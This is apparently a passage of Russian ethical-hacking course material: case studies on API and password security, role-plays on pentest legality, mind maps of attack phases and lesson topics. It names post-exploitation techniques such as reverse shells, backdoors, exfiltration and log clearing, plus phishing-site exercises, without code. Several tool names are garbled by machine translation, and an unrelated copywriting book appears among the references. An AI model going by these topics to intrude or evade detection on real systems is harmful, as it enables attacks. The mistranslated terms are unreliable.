- Безопасность API часто недооценивается, хотя именно через неё происходит большинство утечек данных.
- Важно проверять не только наличие аутентификации, но и её корректную реализацию.
Дополнительные задания для самостоятельной работы
- Протестировать другие эндпоинты на наличие IDOR (незащищённой прямой ссылки на объект).
- Реализовать защиту с помощью OAuth2 и протестировать её.
- Написать скрипт, который автоматически проверяет наличие открытых эндпоинтов.
Кейс 2: Слабые пароли в системе управления CMS
Описание ситуации
Вы проводите пентест внутренней CMS компании. После успешного получения дампа базы данных вы обнаруживаете, что многие учётные записи администраторов используют слабые или повторяющиеся пароли. Некоторые из них хранятся в незашифрованном виде.
Исходные данные
- Система: собственная CMS на PHP
- База данных: MySQL
- Пароли: MD5, обычный текст
- Инструменты: Hashcat, Джон-Потрошитель
Анализ проблемы
Хранение паролей в небезопасном формате делает их уязвимыми для расшифровки. Слабые пароли легко подбираются даже без взлома системы.
Возможные причины уязвимости
- Использование устаревших алгоритмов хеширования (MD5).
- Отсутствие политики сложности паролей.
- Нет механизма принудительной смены пароля при регистрации.
Решение / рекомендации
- Перейти на современные алгоритмы хеширования (bcrypt, Argon2).
- Установить требования к сложности паролей (минимум 12 символов, разные регистры, цифры, специальные символы).
- Введите двухфакторную аутентификацию (2FA).
- Заблокировать возможность повторного использования старых паролей.
Пример исправления
password_hash($пароль, PASSWORD_BCRYPT)
if (password_verify($password, $password_hash)) { // Авторизация прошла успешно }
Альтернативные меры
- Настройка политики истечения срока действия паролей.
- Оповещение пользователей о необходимости смены слабого пароля.
- Автоматическая блокировка аккаунта после нескольких неудачных попыток входа.
Обучающие моменты
Что изучают студенты:
- Анализ хэшей и восстановление исходных паролей.
- Подбор слабых паролей с помощью словарей и брутфорса.
- Современные практики хранения паролей.
- Проведение аудита безопасности учетных записей.
Примечание
- Часто слабые пароли становятся причиной внутренних инцидентов и фишинговых атак.
- Даже при наличии других мер безопасности плохие пароли могут стать точкой входа.
Дополнительные задания для самостоятельной работы
- Создайте свой словарь для подбора паролей на основе данных компании.
- Выполнить атаку типа «словарный поиск» и «грубая сила» на тестовые хэши.
- Написать скрипт для проверки сложности пароля перед сохранением в БД.
Ролевая игра №1: «Первый пентест: добро или нарушение?»
Цель игры
Познакомить студентов с основами этичного хакинга, научить различать легальные и нелегальные действия при тестировании безопасности, развить навыки принятия решений и понимания последствий своих действий.
Формат
- Тип: Образовательная ролевая игра (виртуальная/офлайн)
- Участники: 4–6 человек
- Продолжительность: 2 академических часа
- Материалы: сценарий, карточки с ролями, шаблоны заданий, этический кодекс, бланк для самоанализа
Сеттинг
Вы — начинающий специалист по кибербезопасности, который только начал изучать методы тестирования на проникновение. Ваш друг, разработчик одного сайта, просит вас «проверить его безопасность». У вас нет официального разрешения, но вы уверены, что хотите помочь. Однако ваша деятельность может быть расценена как неправомерная.
Роли в игре
Этапы игры
Этап 1: Задача
- Хакер получает задание от друга: «Проверь мой сайт на уязвимости».
- У него нет официального разрешения, но он уверен, что действует во благо.
Этап 2: Проведение теста
- Хакер сканирует сайт, обнаруживает XSS и сообщает об этом другу.
- В это время администратор сайта замечает активность и подает жалобу.
Этап 3: Конфликт
- Возникает конфликт между хакером, администратором и владельцем сайта.
- Возможно вмешательство юриста или ментора.
Этап 4: Рефлексия
- Все участники обсуждают:
- Были ли действия этичными?
- Как правильно провести пентест?
- Чем этичный хакинг отличается от взлома?
Обучающие эффекты
Возможные проблемы и вызовы во время игры
Дополнительно
- По окончании игры можно раздать бланк для самоанализа , в котором каждый участник ответит на вопросы:
- Что я узнал нового?
- Что бы я сделал иначе?
- Какие ошибки были допущены?
- Также рекомендуется провести обсуждение на тему: Как правильно организовать пентест? Когда помощь становится нарушением?
Ролевая игра №2: «Утечка данных клиента»
Цель игры
Научить студентов реагировать на инциденты, связанные с безопасностью, соблюдать этические нормы при обработке конфиденциальной информации и взаимодействовать в команде в кризисных ситуациях.
Формат
- Тип: Образовательная ролевая игра (виртуальная/офлайн)
- Участники: 5–7 человек
- Продолжительность: 3 академических часа
- Материалы: Сценарий инцидента, карточки ролей, шаблоны отчетов, бланки обратной связи
Сеттинг
Вы — команда специалистов по информационной безопасности крупного банка. Внезапно выяснилось, что из-за уязвимости в API произошла утечка персональных данных клиентов. Ваша задача — оперативно оценить масштаб ущерба, сообщить клиентам и регулирующим органам, а также минимизировать репутационные потери.
Роли в команде
Этапы игры
Этап 1: Анализ инцидента
- Получение сигнала об утечке.
- Определение типа уязвимости (например, небезопасная конечная точка API).
- Выявление объема просочившейся информации (ФИО, номера карт, адреса).
Этап 2: Реакция и локализация
- Совместное решение: уведомлять ли клиентов немедленно или дождаться фиксации?
- Подготовка технического фикса.
- Уведомление регулирующих органов в соответствии с требованиями законодательства.
Этап 3: Клиентская коммуникация
- Разработка текста уведомления клиентам.
- Подготовка пресс-релиза и ответов на вопросы журналистов.
- Обсуждение необходимости компенсаций или бесплатного мониторинга кредитных историй.
Этап 4: Итоговая презентация
- Команды представляют:
- Техническое описание инцидента и пути устранения;
- Сообщение клиентам и СМИ;
- Отчет руководству и регулятору.
Обучающие эффекты
Возможные проблемы и вызовы во время игры
Дополнительно
- Можно использовать шаблоны отчетов по инцидентам (Incident Report Template).
- После игры проведите разбор: как прошло распределение ролей, были ли этические дилеммы, какие решения оказались наиболее эффективными.
Ролевая игра №3: «Хакер против компании: этическая дилемма»
Цель игры
Развить навыки принятия этических решений, научиться балансировать между интересами бизнеса и принципами этичного хакинга, понять границы допустимого при тестировании безопасности.
Формат
- Тип: Образовательная ролевая игра (виртуальная/офлайн)
- Участники: 5–6 человек
- Продолжительность: 2–3 академических часа
- Материалы: сценарий, карточки с ролями, этический кодекс, шаблоны контрактов
Сеттинг
Вы — этичный хакер, нанятый стартапом для проведения пентеста. Во время тестирования вы находите уязвимость, которая позволяет получить доступ к внутренней переписке руководства. Информация может навредить репутации компании, но не связана напрямую с её продуктом. Перед вами стоит выбор: сообщить о найденной уязвимости, скрыть её или запросить дополнительную плату за молчание.
Роли в игре
Этапы игры
Этап 1: Обнаружение уязвимости
- Хакер находит способ получить доступ к внутренней переписке.
- Определяет, насколько это критично для компании.
Этап 2: Этический выбор
- Хакер решает, что делать: сообщить, скрыть, запросить доплату, передать СМИ.
- Все участники высказывают своё мнение.
Этап 3: Последствия
- Обсуждение возможных последствий каждого варианта.
- Моделирование реакции общества, суда, рынка.
Этап 4: Обсуждение и выводы
- Команда делится мнениями: что было бы правильным с точки зрения этики, закона, карьеры?
Обучающие эффекты
Возможные проблемы и вызовы во время игры
Дополнительно
- По окончании игры проведите обсуждение: какие этические принципы вы вспомнили? Что бы вы сделали в реальности? Каковы могли бы быть последствия?
Ролевая игра №4: «Пентест без разрешения»
Цель игры
Научить студентов различать легальные и нелегальные методы тестирования безопасности, осознанно подходить к вопросам авторизации и согласия, развить навыки защиты своих действий в суде.
Формат
- Тип: Образовательная ролевая игра (виртуальная/офлайн)
- Участники: 6–8 человек
- Продолжительность: 3 академических часа
- Материалы: сценарий, роли, шаблоны контрактов, этический кодекс, судебные документы
Сеттинг
Вы — группа этичных хакеров, которые решили протестировать безопасность сайта местной администрации без предварительного разрешения. Цель — выявить уязвимости и помочь улучшить защиту. Однако вас задержала полиция по подозрению в киберпреступлении.
Роли в игре
Этапы игры
Этап 1: Событие
- Описание того, как проходил пентест.
- Почему не было получено официальное разрешение.
Этап 2: Задержание
- Полиция предъявляет обвинение.
- Хакер объясняет свои мотивы.
Этап 3: Судебный процесс
- Слушаются показания свидетелей.
- Адвокат защищает хакера, опираясь на законодательство.
- Представитель власти ссылается на нарушение.
Этап 4: Вердикт
- Судья выносит решение.
- Все участники обсуждают, как можно было избежать конфликта.
Обучающие эффекты
Возможные проблемы и вызовы во время игры
Дополнительно
- По окончании игры провести дискуссию: когда этичный хакинг переходит в область незаконных действий? Как правильно договариваться с заказчиками? Что такое «добросовестное раскрытие»?
Ментальная карта 1: Reconnaissance и разведка
Разведка и слежка
- Пассивная Разведка
- Поиск по WHOIS
- Поиск DNS (dig, nslookup)
- Придурки из Google
- Archive.org
- Разведка в социальных сетях
- Активная Разведка
- Пинг-сканирование (ICMP-сканирование)
- Сканирование портов (TCP/UDP)
- Захват баннера
- Снятие отпечатков пальцев операционной системы
- Инструменты
- Nmap
- Сборщик урожая
- Мальтего
- Shodan CLI /API
- Hunter.io
- Юридические соображения
- Авторизация
- Соблюдение законодательства (GDPR, HIPAA)
Ментальная карта 2: Сканирование и перечисление
Сканирование и Перечисление
- Сканирование сети
- Сканирование TCP-соединения
- Синхронное сканирование (полуоткрытое)
- UDP -сканирование
- НУЛЕВЫЕ / ОКОНЧАТЕЛЬНЫЕ / РОЖДЕСТВЕНСКИЕ сканы
- Перечисление служб
- Перечисление SMB
- Перечисление SNMP
- Перечисление по FTP/SSH/Telnet
- Перечисление LDAP
- Веб - перечисление
- Перебор каталогов (dirb, gobuster)
- Перечисление поддоменов (Sublist3r, assetfinder)
- Обнаружение конечной точки API
- Перечисление пользователей
- Перечисление электронной почты
- Сбор данных по имени пользователя
- Инструменты
- Сценарии Nmap (NSE)
- Enum4Linux
- NetBIOS
- ДНСенум
Ментальная карта 3: Уязвимости и эксплуатация
Оценка уязвимостей и их использование
- Сканирование уязвимостей
- OpenVAS
- Нессус
- Никто
- Квалис
- Разработка эксплойтов
- Основы переполнения буфера
- Программирование, ориентированное на возврат (ROP)
- Переполнение стека
- SEH переполняется
- Фреймворк Metasploit
- Модули (эксплойты, полезные нагрузки, вспомогательные)
- Измерительный Преобразователь
- Модули после эксплуатации
- Распространенные уязвимости
- SQL-инъекция
- XSS
- Ввод команды
- LFI/RFI
- Неправильные конфигурации
- Исследование нулевого дня
- Методы размытия
- Бинарный анализ
- Разница в патче
Ментальная карта 4: Пост-эксплуатация и отчетность
Последующая эксплуатация и отчетность
- Поддержание доступа
- Обратные оболочки
- Связывать ракушки
- Руткиты
- Черные ходы
- Механизмы сохранения
- Повышение Привилегий
- Windows: работа с токенами, ключи реестра, пути к службам без кавычек
- Linux: двоичные файлы с правами суперпользователя, уязвимости ядра, задания cron
- Эксфильтрация данных
- Стеганография
- Туннелирование DNS
- Скрытые каналы
- Заметание следов
- Очистка журнала
- Хронометраж
- Запутывание трафика
- Отчетность
- Краткое изложение
- Технические выводы
- Оценка рисков (CVSS)
- Шаги по исправлению положения
- Доказательство концепций (PoC)
- Инструменты
- Мимикрирующий
- Кобальтовый Удар
- Империя PowerShell
- Завет
- Генераторы отчетов (Dradis, Faraday)
Справочный материал №1: Учебное пособие
Название: Пишем тексты, которые продают
Автор: Сергей Степанов
Год издания: 2020
Краткое описание:
Практическое руководство для начинающих копирайтеров. В книге простым языком объясняются основы создания эффективных текстов: от структуры до психологии восприятия. Содержит упражнения, примеры и шаблоны текстов.
Справочный материал №2: Учебное пособие
Название: «Хакерство: искусство эксплуатации»
Автор: Джон Эриксон
Год издания: 2008 (2-е издание)
Краткое описание:
Фундаментальный труд, раскрывающий суть хакерского мышления. Книга объясняет принципы эксплуатации уязвимостей, работу с памятью, сетевые атаки и основы криптографии. Содержит примеры на языке C и ассемблере, а также практику написания эксплойтов.
Справочный материал №3: Официальная документация
Название: Руководство по тестированию OWASP v4
Источник: Проект по обеспечению безопасности веб-приложений (OWASP)
Год издания: 2016
Краткое описание:
Руководство по тестированию безопасности веб-приложений. Включает подробные методики проверки уязвимостей, таких как SQLi, XSS, CSRF и другие. Предоставляет структурированный подход к проведению тестов на проникновение и оценке рисков.
Справочный материал №4: Учебное пособие
Название: Справочник хакера по веб-приложениям: поиск и использование уязвимостей в системе безопасности
Авторы: Дэфидд Статтард, Маркус Пинто
Год издания: 2011 (2-е издание)
Краткое описание:
Одна из ключевых книг по тестированию безопасности веб-приложений. Содержит практические примеры атак, методологии анализа и способы обхода защитных механизмов. Подходит для углубленного изучения веб-безопасности.
Справочный материал №5: Методическое руководство
Название: Специальная публикация NIST 800-115 — Техническое руководство по тестированию и оценке информационной безопасности
Источник: Национальный институт стандартов и технологий (NIST)
Год издания: 2008
Краткое описание:
Официальное руководство NIST по тестированию и оценке информационной безопасности. Включает рекомендации по планированию тестов, выбору методологии, проведению аудитов и анализу результатов. Используется в профессиональной практике этичного хакинга.
1. Основы этичного хакинга: что такое «белые шляпы» и зачем они нужны
Изучите базовые понятия: разницу между чёрными, серыми и белыми хакерами. Освойте этические принципы и юридические аспекты тестирования на проникновение.
2. Разведка перед атакой: сбор информации о цели (Reconnaissance)
Научитесь использовать такие инструменты, как WHOIS, Shodan, Google Dorks и другие методы пассивной разведки. Проведите исследование реального домена.
3. Сканирование сетей и выявление уязвимостей
Освойте Nmap, Nessus и OpenVAS. Выполните сканирование локальной сети и обнаружьте открытые порты и сервисы.
4. Анализ трафика с помощью Wireshark
Изучите основы перехвата и анализа сетевого трафика. Научитесь находить подозрительные соединения и выявлять потенциальные атаки.
5. Работа с метасплоитом: первый эксплойт
Ознакомьтесь с фреймворком Metasploit. Выполните тестовый запуск эксплойта на виртуальной машине Kali Linux.
6. Брутфорс и взлом паролей: методы защиты от них
Изучите типичные подходы к подбору паролей (грубый перебор, словарная атака). Научитесь использовать Hydra и John the Ripper. Проверьте надёжность собственных паролей.
7. Социальная инженерия: как манипулируют людьми
Узнайте, как злоумышленники используют психологию для получения доступа к данным. Составьте план фишинговой атаки и методы противодействия ей.
8. Веб-пентест: поиск уязвимостей в веб-приложениях
Ознакомьтесь с OWASP Top 10. Найдите SQL-инъекции, XSS и CSRF на тестовом сайте.
9. Криптография для этичных хакеров: основы и применение
Изучите виды шифрования, алгоритмы AES, RSA, SHA. Узнайте, как правильно использовать криптографию и где она может быть взломана.
10. Безопасность беспроводных сетей: анализ уязвимостей Wi-Fi
Научитесь тестировать безопасность WEP, WPA/WPA2. Проведите демонстрационный взлом в контролируемой среде.
11. Фишинг и защита от него: создание и распознавание атак
Создайте образец фишингового сайта и электронного письма. Разработайте политики безопасности для защиты сотрудников.
12. Использование Kali Linux: установка и настройка рабочей среды
Настройте виртуальную машину Kali Linux. Освойте терминал и базовые команды системы.
13. Сниффинг и MITM-атаки: как перехватывать данные в сети
Выполните перехват данных с помощью Ettercap и других инструментов. Изучите методы защиты от атак типа «человек посередине».
14. Сетевой хардкор: TCP/IP и работа протоколов
Погрузитесь в изучение модели OSI и TCP/IP. Научитесь читать заголовки пакетов и понимать поведение протоколов.
15. Автоматизация задач с помощью Python в этичном хакинге
Напишите простой сканер портов или брутфорсер на Python. Освойте работу с сокетами и библиотеками для сетевых задач.
16. Взлом операционных систем: эксплуатация уязвимостей Windows/Linux
Протестируйте эксплойты на уязвимых машинах (например, Metasploitable). Изучите повышение привилегий и способы его предотвращения.
17. Обнаружение и предотвращение вторжений: IDS/IPS и SIEM
Ознакомьтесь с системами обнаружения вторжений, такими как Snort и ELK Stack. Настройте мониторинг и анализ событий безопасности.
18. Тестирование мобильных приложений: Android и iOS
Изучите методы анализа APK-файлов, реверс-инжиниринг и поиск уязвимостей в мобильных приложениях.
19. Облачная безопасность: защита облачных решений
Ознакомьтесь с уязвимостями в AWS, Azure и GCP. Проверьте настройки IAM, открытые хранилища и конфигурации.
20. Безопасность IoT: взлом устройств Интернета вещей
Узнайте, как тестировать безопасность умных устройств. Протестируйте прошивки и протоколы связи.
21. Отчет по результатам пентеста: как оформлять найденные уязвимости
Научитесь составлять профессиональные отчёты с доказательствами, рекомендациями и рисками. Подготовьте отчёт по результатам одного из выполненных тестов.
22. Сценарии реальных атак: CTF-задачи и симуляции
Участвуйте в CTF-соревнованиях и решайте практические задачи по взлому, расшифровке и анализу уязвимостей.
23. Работа с уязвимостями в CMS: WordPress, Joomla и других
Изучите типичные проблемы в популярных системах управления контентом. Найдите и устраните уязвимости на тестовых сайтах.
24. Методология пентеста: PTES и OSSTMM
Ознакомьтесь с профессиональными стандартами проведения тестов на проникновение. Составьте свой чек-лист и план пентеста.
25. Как начать карьеру этичного хакера: сертификация, резюме, портфолио
Узнайте, какие существуют сертификаты (CEH, OSCP, CISSP), как их получить и как строить карьеру в сфере информационной безопасности.
Нет элементов для просмотра